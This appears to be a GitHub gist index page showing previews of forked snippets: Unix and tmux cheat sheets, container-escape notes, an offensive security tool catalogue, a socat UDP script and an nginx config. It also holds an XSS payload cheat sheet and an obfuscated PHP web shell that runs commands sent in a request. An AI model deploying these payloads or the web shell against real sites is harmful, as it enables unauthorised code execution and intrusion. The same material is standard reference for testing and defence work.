- There are three types of permisions in files and folders in unix
- Read (r)
- Write (w)
- Execute (x)
- And, there is a clasificacion of users called UGO (explained bellow):
- U ~> User (usually, you)
Tuan T tuantmb
😹
tuantmb
/ chmodCheatSheet.md
Created
October 29, 2020 09:12
— forked from juanarbol/chmodCheatSheet.md
Chmod cheat sheet
tuantmb
/ README.md
Created
October 20, 2020 11:22
— forked from FrankSpierings/README.md
Linux Container Escapes and Hardening
-
namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
-
mount_namespaces - overview of Linux mount namespaces
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/ | |
| 3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/ | |
| 3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/ | |
| 42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d | |
| acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/ | |
| ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html | |
| admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html | |
| adminpagefinder 0.1 This python script looks for a large amount of possible administrative interfaces on a given site. http://packetstormse |
tuantmb
/ tmux-cheatsheet.markdown
Created
July 15, 2020 04:38
— forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet
tuantmb
/ Oh my zsh with autosuggestions & syntax-highlighting.md
Created
July 15, 2020 02:50
— forked from dogrocker/Oh my zsh with autosuggestions & syntax-highlighting.md
tuantmb
/ udp-multi-socat.sh
Created
June 18, 2020 04:02
— forked from mathieue/udp-multi-socat.sh
udp multiplexer with socat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| socat - udp4-listen:8125,fork | tee >(socat - udp-sendto:127.0.0.1:8135) >(socat - udp-sendto:127.0.0.1:8140) |
tuantmb
/ xss_vectors.txt
Created
June 4, 2020 07:36
— forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
tuantmb
/ dynamic-dns.txt
Created
June 4, 2020 07:03
— forked from neu5ron/dynamic-dns.txt
List of Dynamic DNS Domains/FQDNs. Make sure to download this as zip,because the list is so long it wont display fully in a web browser..even using the "Raw" link won't work. The ZIP link is just in the top right labeled "Download ZIP". For a list of dynamic dns providers see: https://gist.github.com/neu5ron/860c158180e01b61a524
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 3d-game.com #dtdns.com | |
| 4irc.com #dtdns.com | |
| b0ne.com #dtdns.com | |
| bbsindex.com #dtdns.com | |
| chatnook.com #dtdns.com | |
| darktech.org #dtdns.com | |
| deaftone.com #dtdns.com | |
| dtdns.net #dtdns.com | |
| effers.com #dtdns.com | |
| etowns.net #dtdns.com |
tuantmb
/ outlook.conf
Created
May 14, 2020 09:35
— forked from enoch85/outlook.conf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # nginx@nginx:~$ cat /etc/nginx/sites-available/outlook.conf | |
| server { | |
| listen 192.168.128.2:80; | |
| server_name yourdomain.com; | |
| return 301 https://yourdomain.com$request_uri; | |
| } | |
| server { | |
| listen 192.168.128.2:443; |
tuantmb
/ rev_shell.php
Created
May 8, 2020 11:35
— forked from terjanq/rev_shell.php
The shortest non-alphanumeric reverse shell script (19 bytes)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |